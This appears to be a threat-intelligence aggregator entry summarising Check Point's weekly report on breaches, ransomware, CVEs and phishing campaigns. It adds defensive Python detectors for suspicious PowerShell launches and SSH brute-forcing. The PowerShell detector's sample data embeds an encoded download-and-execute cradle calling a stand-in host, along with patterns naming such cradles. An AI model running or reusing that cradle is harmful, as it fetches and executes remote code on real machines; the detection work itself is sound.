12th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 12th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Manage My Health, New Zealand's largest patient portal, has acknowledged a cyberattack that occurred in December 2025 and potentially exposed data of nearly 110K users. An alleged attacker, dubbed Kazu, claimed responsibility and […] The post 12th January – Threat Intelligence Report appeared first on Check Point Research.
AI Analysis
Technical Summary
The 12th January Threat Intelligence Report from Check Point Research summarizes the week's notable attacks, vulnerabilities and campaigns across sectors worldwide.

Among the incidents is a cyberattack on Manage My Health, New Zealand's largest patient portal, which potentially exposed sensitive data of approximately 110,000 users; an alleged attacker calling themselves Kazu claimed responsibility and demanded a ransom, indicating a financially motivated actor. In Europe, France's Office for Immigration and Integration suffered a data breach through a third-party operator, exposing personal data of foreign residents, including names, contact details and immigration information. Ledger, the crypto hardware wallet manufacturer, disclosed a breach at its e-commerce partner Global-e, which has led to phishing campaigns targeting customers to harvest wallet credentials, although seed phrases were not exposed by the breach itself.

The report also covers ransomware activity by Clop, Medusa and LockBit 5.0. The tooling described uses ChaCha20-Poly1305 authenticated encryption with X25519 key exchange and BLAKE2b hashing for key derivation (BLAKE2b is a hash function, so it supports the key exchange rather than performing it), and pairs encryption with termination of backup services and data exfiltration to maximize pressure on victims.

Vulnerabilities covered include a critical pre-authentication remote code execution flaw in SmarterTools (CVE-2025-52691, CVSS 10.0), a code injection vulnerability in Open WebUI (CVE-2025-64496), and a medium-severity flaw in Cisco Identity Services Engine (CVE-2026-20029) that requires valid administrative credentials to exploit.

Active campaigns include the GoBruteforcer botnet, which compromises Linux servers by brute-forcing credentials; the OPCOPRO "Truman Show" social engineering scam, which abuses WhatsApp and Telegram for identity theft; and PHALT#BLYX, a phishing campaign against European organizations that impersonates Booking.com to steal credentials and uses PowerShell execution to escalate privileges.

Check Point states that its IPS, Threat Emulation and Harmony Endpoint products protect against many of these threats. Taken together, the items show a threat landscape that combines ransomware, data breaches, phishing and exploitation of software vulnerabilities, which is the case for layered defenses.
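The PHALT#BLYX description above ends with PowerShell execution on the victim's machine. The following is an added example, not code from Check Point's report or from any published analysis of the campaign, showing the kind of behavioral check an EDR or SIEM rule applies to process-creation events: it scores PowerShell launches by whether a user-facing application spawned them and whether the command line carries evasion flags or a download-and-execute cradle, decoding `-EncodedCommand` payloads (base64 of UTF-16LE text) so that obfuscated commands are scored on their plain text as well. The event records, the parent-process list, the suspicious patterns and the address `203.0.113.50` are constructed assumptions for illustration, not indicators published for PHALT#BLYX.

```python
"""Score PowerShell process-creation events for phishing-style execution.

Added illustration, not code from the Check Point report. Event fields follow
the usual Sysmon/EDR shape (ParentImage, Image, CommandLine); the events,
parent list and patterns below are constructed assumptions.
"""
import base64
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumption: a shell spawned directly by one of these user-facing apps is unusual
USER_FACING_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe",
                       "winword.exe", "excel.exe", "explorer.exe"}
# Assumed command-line patterns; each pattern that matches adds one point
SUSPICIOUS = [
    (r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-nop(?:rofile)?\b", "no profile"),
    (r"(?i)-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"(?i)\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|\biwr\b",
     "download/execute cradle"),
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event; (0, []) for non-PowerShell images."""
    if _basename(ev["Image"]) not in SHELLS:
        return 0, []
    reasons = []
    parent = _basename(ev["ParentImage"])
    if parent in USER_FACING_PARENTS:
        reasons.append(f"spawned by user-facing app {parent}")
    text = ev["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"  # score the obfuscated payload on its plain text too
    for pattern, why in SUSPICIOUS:
        if re.search(pattern, text):
            reasons.append(why)
    return len(reasons), reasons


def triage(events, min_score=2):
    """Return [(ProcessId, score, reasons)] for events scoring at least min_score."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= min_score:
            hits.append((ev["ProcessId"], score, reasons))
    return hits


# Constructed sample: the first event models a lure that ends in a hidden, encoded
# PowerShell launch from the browser; the others are ordinary activity.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.50/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"ProcessId": 4200, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "CommandLine": "pwsh.exe"},
    {"ProcessId": 4210, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, score, reasons in triage(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

The threshold of two points keeps a user who simply opens a shell from Explorer (one point) out of the alert queue, while the phishing-shaped launch scores on every dimension. In production the same scoring would be fed by Sysmon Event ID 1 or the EDR's process telemetry rather than by the inline sample.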
Potential Impact
European organizations face significant risks from these threats, particularly those in sectors handling sensitive personal data such as immigration offices, healthcare, and financial services. The breach of France’s immigration office highlights the vulnerability of government-related third-party providers, potentially compromising the privacy of foreign residents and impacting trust in public institutions. The Ledger-related phishing campaigns pose a risk to European cryptocurrency users, increasing the likelihood of financial fraud and identity theft. The PHALT#BLYX campaign specifically targets European hospitality businesses, threatening credential theft and unauthorized access, which could disrupt operations and lead to data loss. Ransomware groups like Clop and LockBit 5.0, known to target large organizations, could cause operational downtime, financial losses, and reputational damage if they expand their activities in Europe. Vulnerabilities in widely used software such as Cisco Identity Services Engine and SmarterTools could be exploited to gain unauthorized access or execute remote code, potentially leading to full system compromise. The presence of botnets like GoBruteforcer targeting Linux servers increases the risk of credential theft and lateral movement within networks. Overall, these threats could undermine data confidentiality, integrity, and availability, affecting compliance with GDPR and other regulations, and causing significant operational and financial impacts.
Mitigation Recommendations
European organizations should implement a multi-layered defense tailored to the threats outlined. For CVE-2025-52691 in SmarterTools and CVE-2025-64496 in Open WebUI, upgrade to the vendor's fixed versions immediately; the SmarterTools flaw is pre-authentication, so any exposed instance should be treated as reachable by an attacker until it is patched. For CVE-2026-20029 in Cisco Identity Services Engine, exploitation requires valid administrative credentials, so the practical risk comes from compromised or over-privileged admin accounts: restrict administrative access, require MFA on it, monitor admin sessions for anomalous activity, and check the vendor advisory for a fix. To counter ransomware, deploy endpoint detection and response (EDR) with behavioral analysis (the report names Check Point Harmony Endpoint and Threat Emulation) to detect and block ransomware execution and lateral movement, and keep backups offline or immutable so that the backup-service termination tactic the report describes cannot remove the only recovery path. Strengthen phishing defenses by training staff on the social engineering used in PHALT#BLYX and the Ledger-related scams, filtering email, and enforcing MFA to limit the value of stolen credentials; since credential-phishing kits can relay one-time codes, prefer phishing-resistant factors such as FIDO2/WebAuthn where available. Audit third-party vendors regularly and enforce data protection agreements to reduce supply-chain exposure of the kind seen in the France immigration office and Ledger/Global-e incidents. Segment networks, enforce strict access controls, and monitor for brute-force attempts against exposed services to limit botnets such as GoBruteforcer. Finally, maintain incident response plans and run regular tabletop exercises for ransomware and data breach scenarios.
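The recommendation to monitor for brute-force attempts can be implemented directly from authentication logs. The following added example (not code from the report or from Check Point) is a sliding-window detector over syslog-style sshd lines: it flags a source address that accumulates a threshold of failed logins within a time window, and separately flags the case that matters most, a successful login from an address that was already flagged. SSH is used as the illustrative service because the report describes GoBruteforcer only as brute-forcing Linux servers; the log lines, the hostname `web01`, the documentation-range addresses and the year 2026 used to complete syslog timestamps are constructed assumptions.

```python
"""Sliding-window brute-force detector for sshd auth.log lines.

Added illustration, not code from the Check Point report. The log format
assumed is classic syslog-style sshd output; the sample lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed line shape: "<Mon DD HH:MM:SS> <host> sshd[<pid>]: <Failed|Accepted> ... from <ip> port <n>"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)
YEAR = 2026  # syslog timestamps carry no year; assumed for the constructed sample


def parse(line):
    """Return (timestamp, failed, user, ip) or None for lines that are not auth results."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"] == "Failed", m["user"], m["ip"]


def detect(lines, threshold=5, window_s=60):
    """Return a list of (ip, kind, detail) alerts, in log order.

    kind == "bruteforce":         ip reached `threshold` failures within `window_s` seconds
    kind == "bruteforce_success": an already-flagged ip then authenticated successfully
    """
    failures = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, failed, user, ip = rec
        if failed:
            q = failures[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()  # drop failures older than the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce",
                               f"{len(q)} failures within {window_s}s, last user {user!r}"))
        elif ip in flagged:
            alerts.append((ip, "bruteforce_success",
                           f"accepted login as {user!r} after brute force"))
    return alerts


SAMPLE_LOG = [  # constructed auth.log excerpt; addresses are from documentation ranges
    "Jan 12 10:00:01 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51234 ssh2",
    "Jan 12 10:00:03 web01 sshd[2233]: Accepted publickey for deploy from 198.51.100.20 port 40022 ssh2",
    "Jan 12 10:00:05 web01 sshd[2235]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2",
    "Jan 12 10:00:09 web01 sshd[2237]: Failed password for invalid user test from 203.0.113.7 port 51244 ssh2",
    "Jan 12 10:00:14 web01 sshd[2239]: Failed password for invalid user oracle from 203.0.113.7 port 51250 ssh2",
    "Jan 12 10:00:20 web01 sshd[2241]: Failed password for invalid user postgres from 203.0.113.7 port 51256 ssh2",
    "Jan 12 10:00:26 web01 sshd[2243]: Failed password for invalid user ubuntu from 203.0.113.7 port 51260 ssh2",
    "Jan 12 10:00:40 web01 sshd[2245]: Accepted password for deploy from 203.0.113.7 port 51270 ssh2",
    "Jan 12 10:00:41 web01 sshd[2245]: pam_unix(sshd:session): session opened for user deploy(uid=1001) by (uid=0)",
    "Jan 12 10:05:00 web01 sshd[2301]: Failed password for backup from 192.0.2.9 port 33001 ssh2",
    "Jan 12 10:07:00 web01 sshd[2305]: Failed password for backup from 192.0.2.9 port 33002 ssh2",
    "Jan 12 10:09:00 web01 sshd[2309]: Failed password for backup from 192.0.2.9 port 33003 ssh2",
    "Jan 12 10:11:00 web01 sshd[2313]: Failed password for backup from 192.0.2.9 port 33004 ssh2",
    "Jan 12 10:13:00 web01 sshd[2317]: Failed password for backup from 192.0.2.9 port 33005 ssh2",
]

if __name__ == "__main__":
    for ip, kind, detail in detect(SAMPLE_LOG):
        print(f"{kind:20} {ip:15} {detail}")
```

With the defaults, 203.0.113.7 is flagged on its fifth failure and again when its later password login succeeds, while 192.0.2.9, which fails only once every two minutes, stays under the 60-second window; widening the window to ten minutes catches that slow pattern too. The `bruteforce_success` alert is the one to route to incident response, since it means a credential has already been guessed.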
Affected Countries
France, United Kingdom, Germany, Netherlands, Italy, Spain, Poland
Technical Details
- Article Source: https://research.checkpoint.com/2026/12th-january-threat-intelligence-report/ (fetched 2026-01-12T10:08:46Z, 925 words)
Threat ID: 6964c82eda2266e83846a841
Added to database: 1/12/2026, 10:08:46 AM
Related Threats
- CVE-2026-22214: CWE-121 Stack-based Buffer Overflow in RIOT RIOT OS (Medium)
- CVE-2026-22801: CWE-125 Out-of-bounds Read in pnggroup libpng (Medium)
- CVE-2026-22695: CWE-125 Out-of-bounds Read in pnggroup libpng (Medium)
- CVE-2026-22798: CWE-532 Insertion of Sensitive Information into Log File in softwarepub hermes (Medium)
- CVE-2026-22789: CWE-434 Unrestricted Upload of File with Dangerous Type in SMEWebify WebErpMesv2 (Medium)